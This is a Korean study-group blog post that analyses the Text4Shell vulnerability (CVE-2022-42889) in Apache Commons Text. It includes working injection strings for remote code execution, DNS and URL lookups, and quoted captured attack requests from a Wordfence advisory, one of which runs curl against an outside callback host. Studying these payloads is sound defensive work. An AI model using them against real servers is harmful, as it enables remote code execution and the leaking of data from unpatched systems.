이번주에는, 시험 주간이 끝난 뒤에 있을 발표세미나에서 어떠한 자료를 산출물로 내면 좋을지 논의하였습니다.
-> 보고서 형태로 작성하여 정리하기로 결정
그리고, 앞선 시간에 진행하였던 활동들에 대해서 이야기 하면서 다시한번 취약점에 대해서 정리를 하였습니다.
지난 시간에 살펴보았던 text4shell 코드 내부의 모습은 아래와 같습니다.
이와 함께 지난시간 살펴보았던 공격 코드 예시에 덧붙여 더 많은 예시 코드들을 가져왔습니다.
| 공격 | prefix | 공격 코드 예시 |
| Remote code execution | script | ${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch /tmp/foo’)} ${script:JEXL:”.getClass().forName(‘java.lang.Runtime’).getRuntime().exec(‘touch /tmp/pwned’)} |
| Sending information through DNS queries to malicious domains. | dns | ${dns:address|commons.apache.org} |
| Disclosure of internal network information via HTTP (HTTPS) requests | url | ${url:UTF-8:https://nvd.nist.gov/vuln/detail/CVE-2022-42889} |
더욱 자세한 내용은 아래와 같습니다.
DNS prefix:
${dns:address:<victimdomain>.<unique identifier>.<listenerdomain>}
Example request:
GET / HTTP/1.1
X-Forwarded-For: 13.53.121.211
Host:<redacted>
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: ${dns:address|<redacted>.acc.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Accept-Encoding: ${dns:address|<redacted>.accenc.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Accept-Language: ${dns:address|<redacted>.acclang.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Access-Control-Request-Headers: ${dns:address|<redacted>.acrh.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Access-Control-Request-Method: ${dns:address|<redacted>.acrm.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Authentication: Bearer ${dns:address|<redacted>.authb2.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Cookie: %5Bredacted%5D=%5Bredacted%5D;
Location: ${dns:address|<redacted>.loc.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Origin: ${dns:address|<redacted>.orig.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Referer: ${dns:address|<redacted>.ref.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Upgrade-Insecure-Requests: ${dns:address|<redacted>.uir.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Api-Version: ${dns:address|<redacted>.xapi.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Csrf-Token: ${dns:address|<redacted>.csrf.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Druid-Comment: ${dns:address|<redacted>.druid.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Origin: ${dns:address|<redacted>.xorig.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Vismaservice: VSP
Script prefix:
${script:javascript:<rce payload>}
Example request:
GET /?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27curl+<redacted>.uri.cd85mppufkgpgd800010cex5ohoqkutab.oast.online%27%29%7D HTTP/1.1
Accept-Encoding: gzip
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Host:<redacted>
Url prefix:
${url:UTF-8:<listenerdomain>/<endpoint>}
Example request:
GET /wp-json/wp/v2/comments?post=%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2Fcanarytokens.com%2Ffeedback%2Fu1mcjpc0ti4po7ukgntl9l7jh%2Fcontact.php%7D HTTP/1.1
X-Forwarded-For: 199.16.53.138
Accept-Encoding: gzip
User-Agent: Fuzz Faster U Fool v1.5.0-dev
Host: <redacted>
출처 :
Threat Advisory: Monitoring CVE-2022-42889 "Text4Shell" Exploit Attempts
On October 17, 2022, the Wordfence Threat Intelligence team began monitoring for activity targeting CVE-2022-42889, or “Text4Shell” on our network of 4 million websites. We started seeing activity targeting this vulnerability on October 18, 2022. Text4
www.wordfence.com
'4-4. 2023-1 심화 스터디 > 오픈된 환경에서의 RCE(원격코드 실행) 취약점 분석 및 공격 시나리오' 카테고리의 다른 글
| [2023.05.06] Text4Shell 취약점 분석 (0) | 2023.05.12 |
|---|---|
| [2023.04.08] Text4Shell 취약점 발생 조건 분석 (0) | 2023.04.14 |
| [2023.04.01] Text4shell 취약점 실행 (0) | 2023.04.06 |
